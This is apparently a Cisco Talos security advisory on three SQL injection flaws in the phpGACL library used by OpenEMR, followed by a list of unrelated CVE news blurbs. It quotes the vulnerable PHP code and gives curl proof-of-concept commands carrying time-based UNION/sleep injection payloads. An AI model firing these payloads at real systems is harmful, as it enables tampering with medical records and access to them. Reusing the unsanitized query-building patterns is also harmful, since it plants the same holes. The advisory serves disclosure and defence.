Headline
CVE-2020-13567: TALOS-2020-1179 || Cisco Talos Intelligence Group
Multiple SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.
Summary
Multiple SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.
Tested Versions
OpenEMR 5.0.2
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)
phpGACL 3.3.7
Product URLs
http://phpgacl.sourceforge.net/
CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
phpGACL is a PHP library that allows developers to implement permission systems via a Generic Access Control List.
The latest version of this library has been found to be used in OpenEMR, as such the tests have been performed against an OpenEMR instance.
Across the whole codebase of phpGACL, SQL queries are built using string concatenation, and parameters are often not sanitized.
The following is an (incomplete) list of code paths that lead to SQL injection, caused by missing sanitization of the input parameters that can be injected by an attacker via GET or POST request. Note that similar vulnerable patterns can be seen in edit_objects.php, edit_object_sections.php and others.
CVE-2020-13566 - phpGACL database delete_group SQL injection
In admin/edit_group.php, when the POST parameter action is “Delete”, the POST parameter delete_group leads to a SQL injection:
...
switch ($_POST['action']) {
case 'Delete':
$gacl_api->debug_text('Delete');
if (count($_POST['delete_group']) > 0) {
//Always reparent children when deleting a group.
foreach ($_POST['delete_group'] as $group_id) {
$gacl_api->debug_text('Deleting group_id: '. $group_id);
$result = $gacl_api->del_group($group_id, TRUE, $group_type); [1]
if ($result == FALSE) {
$retry[] = $group_id;
}
}
...
The delete_group parameter is sent to the function del_group unsanitized:
function del_group($group_id, $reparent_children=TRUE, $group_type='ARO') {
switch(strtolower(trim($group_type))) {
case 'axo':
$group_type = 'axo';
$table = $this->_db_table_prefix .'axo_groups';
$groups_map_table = $this->_db_table_prefix .'axo_groups_map';
$groups_object_map_table = $this->_db_table_prefix .'groups_axo_map';
break;
default:
$group_type = 'aro';
$table = $this->_db_table_prefix .'aro_groups';
$groups_map_table = $this->_db_table_prefix .'aro_groups_map';
$groups_object_map_table = $this->_db_table_prefix .'groups_aro_map';
break;
}
$this->debug_text("del_group(): ID: $group_id Reparent Children: $reparent_children Group Type: $group_type");
if (empty($group_id) ) {
$this->debug_text("del_group(): Group ID ($group_id) is empty, this is required");
return false;
}
// Get details of this group
$query = 'SELECT id, parent_id, name, lft, rgt FROM '. $table .' WHERE id='. $group_id; [2]
$group_details = $this->db->GetRow($query);
As we can see, the only sanitized argument is group_type, while group_id (former delete_group) is appended to the query unsanitized [2].
Exploit Proof of Concept
This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:
curl -v -H "Cookie: $cookie" -d "action=Delete&delete_group[0]=1234 union select 1,2,3,4,sleep(3)" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
CVE-2020-13567 - phpGACL database parent_id SQL injection
Again in admin/edit_group.php, when the POST parameter action is “Submit”, the POST parameter parent_id leads to a SQL injection:
...
case 'Submit':
$gacl_api->debug_text('Submit');
if (empty($_POST['parent_id'])) {
$parent_id = 0;
} else {
$parent_id = $_POST['parent_id']; [1]
}
//Make sure we're not reparenting to ourself.
if (!empty($_POST['group_id']) AND $parent_id == $_POST['group_id']) {
echo "Sorry, can't reparent to self!<br />\n";
exit;
}
//No parent, assume a "root" group, generate a new parent id.
if (empty($_POST['group_id'])) {
$gacl_api->debug_text('Insert');
$insert_id = $gacl_api->add_group($_POST['value'], $_POST['name'], $parent_id, $group_type); [2]
} else {
$gacl_api->debug_text('Update');
$gacl_api->edit_group($_POST['group_id'], $_POST['value'], $_POST['name'], $parent_id, $group_type);
}
...
The parameter parent_id is passed to both add_group [2] and edit_group [3] unsanitized [1].
function add_group($value, $name, $parent_id=0, $group_type='ARO') {
switch(strtolower(trim($group_type))) {
case 'axo':
$group_type = 'axo';
$table = $this->_db_table_prefix .'axo_groups';
break;
default:
$group_type = 'aro';
$table = $this->_db_table_prefix .'aro_groups';
break;
}
$this->debug_text("add_group(): Name: $name Value: $value Parent ID: $parent_id Group Type: $group_type");
$name = trim($name);
$value = trim($value);
if ( $name == '' ) {
$this->debug_text("add_group(): name ($name) OR parent id ($parent_id) is empty, this is required");
return false;
}
//This has to be outside the transaction, because the first time it is run, it will say the sequence
//doesn't exist. Then try to create it, but the transaction will already by aborted by then.
$insert_id = $this->db->GenID($this->_db_table_prefix.$group_type.'_groups_id_seq',10);
if ( $value === '' ) {
$value = $insert_id;
}
$this->db->BeginTrans();
// special case for root group
if ($parent_id == 0) {
...
} else {
if (empty($parent_id)) {
$this->debug_text("add_group (): parent id ($parent_id) is empty, this is required");
$this->db->RollbackTrans();
return FALSE;
}
// grab parent details from database
$query = 'SELECT id, lft, rgt FROM '. $table .' WHERE id='. $parent_id; [4]
$row = $this->db->GetRow($query);
The function add_group does not sanitize the parent_id at [4], which leads to a SQL injection.
function edit_group($group_id, $value=NULL, $name=NULL, $parent_id=NULL, $group_type='ARO') {
...
$set = array();
// update name if it is specified.
if (!empty($name)) {
$set[] = 'name='. $this->db->quote($name);
}
// update parent_id if it is specified.
if (!empty($parent_id)) {
$set[] = 'parent_id='. $parent_id; [5]
}
// update value if it is specified.
if (!empty($value)) {
$set[] = 'value='. $this->db->quote($value);
}
if (empty($set)) {
$this->debug_text('edit_group(): Nothing to update.');
return FALSE;
}
$this->db->BeginTrans();
$query = 'UPDATE '. $table .' SET '. implode(',', $set) .' WHERE id='. $group_id; [6]
$rs = $this->db->Execute($query);
if (!is_object($rs)) {
$this->debug_db('edit_group');
$this->db->RollbackTrans();
return FALSE;
}
The function edit_group does not sanitize the parent_id at [5], which leads to a SQL injection at [6].
Exploit Proof of Concept
This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:
curl -v -H "Cookie: $cookie" -d "action=Submit&parent_id=1234 union select 1,2,sleep(3)&name=1" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
CVE-2020-13568 - phpGACL database group_id SQL injection
Again in admin/edit_group.php, when the POST parameter action is “Submit”, the POST parameter group_id leads to a SQL injection:
...
case 'Submit':
$gacl_api->debug_text('Submit');
if (empty($_POST['parent_id'])) {
$parent_id = 0;
} else {
$parent_id = $_POST['parent_id']; [1]
}
//Make sure we're not reparenting to ourself.
if (!empty($_POST['group_id']) AND $parent_id == $_POST['group_id']) {
echo "Sorry, can't reparent to self!<br />\n";
exit;
}
//No parent, assume a "root" group, generate a new parent id.
if (empty($_POST['group_id'])) {
$gacl_api->debug_text('Insert');
$insert_id = $gacl_api->add_group($_POST['value'], $_POST['name'], $parent_id, $group_type); [2]
} else {
$gacl_api->debug_text('Update');
$gacl_api->edit_group($_POST['group_id'], $_POST['value'], $_POST['name'], $parent_id, $group_type); [3]
}
...
Like before, group_id is passed to edit_group [2] unsanitized:
function edit_group($group_id, $value=NULL, $name=NULL, $parent_id=NULL, $group_type='ARO') {
$this->debug_text("edit_group(): ID: $group_id Name: $name Value: $value Parent ID: $parent_id Group Type: $group_type");
switch(strtolower(trim($group_type))) {
case 'axo':
$group_type = 'axo';
$table = $this->_db_table_prefix .'axo_groups';
break;
default:
$group_type = 'aro';
$table = $this->_db_table_prefix .'aro_groups';
break;
}
if (empty($group_id) ) {
$this->debug_text('edit_group(): Group ID ('. $group_id .') is empty, this is required');
return FALSE;
}
if ( !is_array($curr = $this->get_group_data($group_id, $group_type)) ) { [4]
$this->debug_text('edit_group(): Invalid Group ID: '. $group_id);
return FALSE;
}
...
The function edit_group calls get_group_data at [4], using the unsanitized group_id:
function get_group_data($group_id, $group_type = 'ARO') {
$this->debug_text("get_group_data(): Group_ID: $group_id Group Type: $group_type");
switch(strtolower(trim($group_type))) {
case 'axo':
$group_type = 'axo';
$table = $this->_db_table_prefix .'axo_groups';
break;
default:
$group_type = 'aro';
$table = $this->_db_table_prefix .'aro_groups';
break;
}
if (empty($group_id) ) {
$this->debug_text("get_group_data(): ID ($group_id) is empty, this is required");
return false;
}
$query = 'SELECT id, parent_id, value, name, lft, rgt FROM '. $table .' WHERE id='. $group_id; [5]
//$rs = $this->db->Execute($query);
$row = $this->db->GetRow($query);
if ($row) {
return $row;
}
$this->debug_text("get_object_data(): Group does not exist.");
return false;
}
We can see at [5] that group_id is concatenated to the query, leading to a SQL injection.
Exploit Proof of Concept
This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:
curl -v -H "Cookie: $cookie" -d "action=Submit&parent_id=1234&group_id=1234 union select 1,2,3,4,5,sleep(3)" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
Timeline
2020-10-23 - Vendor Disclosure
2021-01-05 - Vendor Patched
2021-01-27 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.
Related news
An update is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4083: kernel: fget: check that the fd still exists after getting a ref to it * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation * CVE-2022-25636: kernel: heap out of bounds write in nf_dup_netdev.c
An update for kernel is now available for Red Hat Enterprise Linux 6 Extended Lifecycle Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-0466: kernel: use after free in eventpoll.c may lead to escalation of privilege * CVE-2021-0920: kernel: Use After Free in unix_gc() which could result in a local privilege escalation * CVE-2021-4155: kernel: xfs: raw block device data leak in XFS_IOC_ALLOCSP IOCTL * CVE-2022-0492: kernel: cgroups v1 release_agent feature may ...
An update for the container-tools:2.0 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27649: podman: Default inheritable capabilities for linux container should be empty * CVE-2022-27651: buildah: Default inheritable capabilities for linux container should be empty
An update for the 389-ds:1.4 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4091: 389-ds-base: double free of the virtual attribute context in persistent search
Invicti Acunetix before 14 allows CSV injection via the Description field on the Add Targets page, if the Export CSV feature is used.
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4083: kernel: fget: check that the fd still exists after getting a ref to it * CVE-2022-0492: kernel: cgroups v1 release_agent feature may allow privilege escalation * CVE-2022-25636: kernel: heap out of bounds write in nf_dup_netdev.c
Red Hat OpenShift Virtualization release 2.6.10 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-33195: golang: net: lookup functions may return invalid host names * CVE-2021-33197: golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty * CVE-2021-33198: golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs...
An Access Control vulnerability exists in Desire2Learn/D2L Learning Management System (LMS) 20.21.7 via the quizzing feature, which allows a remote malicious user to disable the Disable right click control.
A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.
An update is now available for Red Hat Ceph Storage 3. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-20288: ceph: Unauthorized global_id reuse in cephx
The Migration Toolkit for Containers (MTC) 1.5.4 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-36221: golang: net/http/httputil: panic due to racy read of persistConn after handler panic
Swimlane’s Asia-Pacific presence grows 173%, highlighting rising demand for low-code security automation.
Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
Google and other firms are adding security configuration to software so cloud applications and services have well-defined security settings — a key component of DevSecOps.
Zoho ManageEngine ADSelfService Plus before 6121, ADAuditPlus 7060, Exchange Reporter Plus 5701, and ADManagerPlus 7131 allow NTLM Hash disclosure during certain storage-path configuration steps.
IT departments must account for the business impact and security risks such applications introduce.
A flaw was found in WildFly Elytron. A variation to the use of a session fixation exploit when using Undertow was found despite Undertow switching the session ID after authentication.
An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles file offsets in binary USD files. A specially crafted malformed file can trigger an arbitrary out-of-bounds memory access that could lead to the disclosure of sensitive information. This vulnerability could be used to bypass mitigations and aid additional exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided file.
An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer 2019.2.2328. A specially crafted file can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.
A flaw was found in Ansible Galaxy Collections. When collections are built manually, any files in the repository directory that are not explicitly excluded via the ``build_ignore`` list in "galaxy.yml" include files in the ``.tar.gz`` file. This contains sensitive info, such as the user's Ansible Galaxy API key and any secrets in ``ansible`` or ``ansible-playbook`` verbose output without the``no_log`` redaction. Currently, there is no way to deprecate a Collection Or delete a Collection Version. Once published, anyone who downloads or installs the collection can view the secrets.
There is an integer overflow vulnerability in dcraw. When the victim runs dcraw with a maliciously crafted X3F input image, arbitrary code may be executed in the victim's system.
A heap double free issue was found in Opensc before version 0.22.0 in sc_pkcs15_free_tokeninfo.
Heap buffer overflow issues were found in Opensc before version 0.22.0 in pkcs15-oberthur.c that could potentially crash programs using the library.
The ongoing war in Ukraine means that defenses are only as good and as strong as those with whom we partner.